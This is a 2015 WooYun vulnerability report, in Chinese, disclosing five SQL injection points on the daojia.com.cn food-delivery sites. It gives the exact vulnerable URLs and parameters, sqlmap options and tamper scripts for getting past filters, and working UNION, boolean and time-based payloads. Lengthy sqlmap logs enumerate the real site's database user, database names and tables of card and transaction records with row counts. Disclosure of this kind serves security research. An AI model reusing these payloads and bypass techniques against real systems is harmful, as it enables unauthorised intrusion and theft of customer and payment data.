当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161042

漏洞标题:到家美食会多处存在SQL注入(涉及商家帐号信息/接近百万的客户记录/几十万卡号/信息记录等等)

相关厂商:daojia.com.cn

漏洞作者: 路人甲

提交时间:2015-12-13 20:48

修复时间:2015-12-18 20:50

公开时间:2015-12-18 20:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-13: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如果只是一处修复不当或者一处存在SQL注入就不提交了,发现还是有好几处的!~~~其中几个是大牛提交过没有修复的,还有几个是新找到的,没有被提交过的!~~~这样还不能走首页???
厂商给的rank挺低的,被大牛提交过的注入点,修复不当,重要的union的也没有修复,导致继续SQL注入;还可以通过增加level和risk,tamper来进行绕过!~~~希望重视一下吧!~~
PS:求来一个20rank可否,测试一天也累了!~~~

详细说明:

注入点一:

http://b.daojia.com.cn/service.php?action=2147483649&user=admin&uid=1449954143596


user仍旧存在注入,union的!~~~

1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: user
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: action=2147483649&user=admin') UNION ALL SELECT NULL,NULL,CONCAT(0x
716f6e7671,0x504c416e6c645a785a43,0x7163666271),NULL#&uid=1449954143596
---
[11:16:41] [INFO] testing MySQL
[11:16:42] [INFO] confirming MySQL
[11:16:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[11:16:42] [INFO] fetching current user
current user: 'daojia@10.1.1.%'
[11:16:42] [INFO] fetching current database
current database: 'daojia'
[11:16:42] [INFO] testing if current user is DBA
[11:16:42] [INFO] fetching current user
[11:16:42] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[11:20:53] [INFO] fetching database users
[11:20:53] [INFO] the SQL query used returns 1 entries
[11:20:53] [INFO] resumed: "'daojia'@'10.1.1.%'"
database management system users [1]:
[*] 'daojia'@'10.1.1.%'
[11:20:53] [INFO] fetching database names
[11:20:53] [INFO] the SQL query used returns 3 entries
[11:20:53] [INFO] starting 3 threads
[11:20:53] [INFO] resumed: "test"
[11:20:53] [INFO] resumed: "daojia"
[11:20:53] [INFO] resumed: "information_schema"
available databases [3]:
[*] daojia
[*] information_schema
[*] test
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| blog_user | 1 |
+---------------------------------------+---------+
Database: daojia
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| bakTbl_Reconciliation20151022 | 982908 |
| Tbl_Reconciliation | 743209 |
| Tbl_UsedCard | 602351 |
| Tbl_CustomValueAccountTransaction | 456038 |
| Tbl_SM | 442691 |
| Tbl_CardPayingRecord | 364366 |
| Tbl_Card | 311683 |
| Tbl_DepositTransaction | 116940 |
| Tbl_CustomValueAccount | 57413 |
| Tbl_Invite | 26148 |
| Tbl_RestaurantDelayedLog | 5244 |
| Tbl_ToAuditCooperation | 2984 |
| Tbl_ServiceMan | 1780 |
| Tbl_GiftCardSubNumber | 1755 |
| Tbl_CardNoRange | 1206 |
| Tbl_Session | 1120 |
| Tbl_ServiceManAuditStat | 487 |
| Tbl_CardPatch | 461 |
| Tbl_DaoJiaAccountStat | 334 |
| Tbl_ToAuditCard | 177 |
| Tbl_FilesUploadLog | 168 |
| Tbl_Area | 145 |
| Tbl_Third_Delivery_Config | 137 |
| Tbl_GiftCard | 108 |
| Tbl_InviteStat | 86 |
| Tbl_Config | 76 |
| Tbl_Province | 34 |
| Tbl_City | 11 |
| Tbl_CardCatagory | 9 |
| Tbl_UpgradeLog | 8 |
+---------------------------------------+---------+


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


7.jpg


增加--level 3 --risk 2测试结果

GET parameter 'user' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] n
sqlmap identified the following injection points with a total of 469 HTTP(s) req
uests:
---
Place: GET
Parameter: user
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: action=2147483649&user=admin') UNION ALL SELECT NULL,NULL,CONCAT(0x
7165676f71,0x5563637a5a6d794d5245,0x7178667071),NULL#&uid=1449954143596
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=2147483649&user=admin') AND 1060=BENCHMARK(5000000,MD5(0x574
e446f)) AND ('ByJf'='ByJf&uid=1449954143596
---
[12:26:43] [INFO] testing MySQL
[12:26:43] [INFO] confirming MySQL
[12:26:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[12:26:43] [INFO] fetching current user
current user: 'daojia@10.1.1.%'
[12:26:43] [INFO] fetching current database
current database: 'daojia'
[12:26:43] [INFO] testing if current user is DBA
[12:26:43] [INFO] fetching current user
[12:26:44] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False


1-1.jpg


注入点二:

http://beijing.daojia.com.cn/combo_list.php?a=2


a存在时间盲注,当然用常规的注入不到,添加参数--level 5 --risk 2 --technique TB --time-sec 5就可以绕过进行注入了!~~~

[17:00:37] [INFO] testing if the target URL is stable. This can take a couple of
seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n]
[17:00:39] [INFO] target URL is stable
sqlmap got a 302 redirect to 'http://beijing.daojia.com.cn:80/index.html'. Do yo
u want to follow? [Y/n]
[17:00:41] [WARNING] heuristic (basic) test shows that GET parameter 'a' might n
ot be injectable
[17:00:41] [INFO] testing for SQL injection on GET parameter 'a'
[17:00:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:01:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[17:02:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[17:03:52] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY o
r GROUP BY clause (RLIKE)'
[17:04:57] [INFO] testing 'Generic boolean-based blind - Parameter replace (orig
inal value)'
[17:04:58] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
ET - original value)'
[17:05:00] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT -
original value)'
[17:05:01] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
nt - original value)'
[17:05:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[17:05:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (
original value)'
[17:05:06] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c
lauses'
[17:05:09] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c
lauses (original value)'
[17:05:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER
BY clauses'
[17:05:15] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER
BY clauses'
[17:05:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:05:32] [INFO] GET parameter 'a' seems to be 'MySQL > 5.0.11 AND time-based b
lind' injectable
[17:05:32] [INFO] checking if the injection point on GET parameter 'a' is a fals
e positive
GET parameter 'a' is vulnerable. Do you want to keep testing the others (if any)
? [y/N] n
sqlmap identified the following injection points with a total of 386 HTTP(s) req
uests:
---
Place: GET
Parameter: a
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=2 AND SLEEP(5)
---
[17:06:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[17:06:20] [INFO] fetching current user
[17:06:20] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[17:06:20] [INFO] retrieved:
[17:06:20] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
daojia@10.1.1.%
current user: 'daojia@10.1.1.%'
[17:11:55] [INFO] fetching current database
[17:11:56] [INFO] retrieved: daojia
current database: 'daojia'
[17:14:10] [INFO] testing if current user is DBA
[17:14:10] [INFO] fetching current user
current user is DBA: False


8.jpg


注入点三:

http://beijing.daojia.com.cn/service.php?action=1879048193&card=111111


card存在注入,添加参数--tamper space2comment.py绕过

[17:39:54] [INFO] loading tamper script 'space2comment'
[17:39:55] [INFO] testing connection to the target URL
[17:39:56] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[17:39:57] [INFO] target URL is stable
[17:39:57] [WARNING] heuristic (basic) test shows that GET parameter 'card' migh
t not be injectable
[17:39:57] [INFO] testing for SQL injection on GET parameter 'card'
[17:39:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:39:58] [INFO] GET parameter 'card' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable
[17:39:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:39:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:39:59] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[17:40:11] [INFO] GET parameter 'card' seems to be 'MySQL > 5.0.11 AND time-base
d blind' injectable
[17:40:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:40:11] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[17:40:11] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[17:40:12] [INFO] target URL appears to have 5 columns in query
[17:40:14] [INFO] GET parameter 'card' is 'MySQL UNION query (NULL) - 1 to 20 co
lumns' injectable
GET parameter 'card' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] n
sqlmap identified the following injection points with a total of 30 HTTP(s) requ
ests:
---
Place: GET
Parameter: card
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=1879048193&card=111111 AND 4490=4490
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: action=1879048193&card=-9445 UNION ALL SELECT NULL,NULL,NULL,NULL,C
ONCAT(0x71736a6871,0x447963734f69744a5270,0x71646f6a71)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: action=1879048193&card=111111 AND SLEEP(5)
---
[17:40:17] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[17:40:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[17:40:17] [INFO] fetching current user
current user: 'daojia@10.1.1.%'
[17:40:17] [INFO] fetching current database
current database: 'beijing'
[17:40:18] [INFO] testing if current user is DBA
[17:40:18] [INFO] fetching current user
current user is DBA: False


9.jpg


注入点四:

http://beijing.daojia.com.cn/review.php?a=67&r=2337


在这个界面,a依旧可以通过sqlmap中添加参数--level 5 --risk 2 --technique TB --time-sec 5就可以绕过进行注入了!~~~

sqlmap identified the following injection points with a total of 930 HTTP(s) req
uests:
---
Place: GET
Parameter: a
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=67 AND SLEEP(5)&r=2337
---
[18:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[18:25:09] [INFO] fetching current user
[18:25:09] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[18:25:09] [INFO] retrieved:
[18:25:09] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
d
[18:26:12] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[18:26:12] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[18:26:19] [ERROR] invalid character detected. retrying..
[18:26:19] [WARNING] increasing time delay to 6 seconds
aojia@10.1.1.%
current user: 'daojia@10.1.1.%'
[18:32:24] [INFO] fetching current database
[18:32:24] [INFO] retrieved: daojia
[18:35:07] [ERROR] invalid character detected. retrying..
[18:35:07] [WARNING] increasing time delay to 7 seconds
current database: 'daojia'
[18:35:12] [INFO] testing if current user is DBA
[18:35:12] [INFO] fetching current user
current user is DBA: False


10.jpg


注入点五:

http://beijing.daojia.com.cn/service.php?action=CANTURLFOODNUM&foodID=415041


foodID存在注入,添加参数--threads 10 --dbms "MySQL" --current-user --current-db --is-dba -p foodID --technique T --time-sec 1 --tameper between.py
绕过

[19:23:49] [INFO] loading tamper script 'between'
[19:23:49] [INFO] testing connection to the target URL
[19:24:00] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[19:24:01] [INFO] target URL is stable
[19:24:01] [WARNING] heuristic (basic) test shows that GET parameter 'foodID' mi
ght not be injectable
[19:24:01] [INFO] testing for SQL injection on GET parameter 'foodID'
[19:24:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:24:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:24:05] [INFO] testing 'MySQL inline queries'
[19:24:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:24:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:24:16] [INFO] GET parameter 'foodID' seems to be 'MySQL > 5.0.11 AND time-ba
sed blind' injectable
[19:24:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:24:16] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[19:24:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:24:22] [INFO] checking if the injection point on GET parameter 'foodID' is a
false positive
GET parameter 'foodID' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 85 HTTP(s) requ
ests:
---
Place: GET
Parameter: foodID
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: action=CANTURLFOODNUM&foodID=415041 AND SLEEP(5)-- ZtMW
---
[19:24:43] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[19:24:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[19:24:43] [INFO] fetching current user
[19:24:43] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[19:24:43] [INFO] retrieved:
[19:24:43] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[19:25:00] [INFO] adjusting time delay to 1 second due to good response times
daojia@10.1.1.%
current user: 'daojia@10.1.1.%'
[19:26:05] [INFO] fetching current database
[19:26:05] [INFO] retrieved: daojia
current database: 'daojia'
[19:26:32] [INFO] testing if current user is DBA
[19:26:32] [INFO] fetching current user
current user is DBA: False


11.jpg


漏洞证明:

如上

修复方案:

Rank真的很低,虽然现在用户量不大,趁早修复吧!~~~测试一天了,累了。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-18 20:50

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无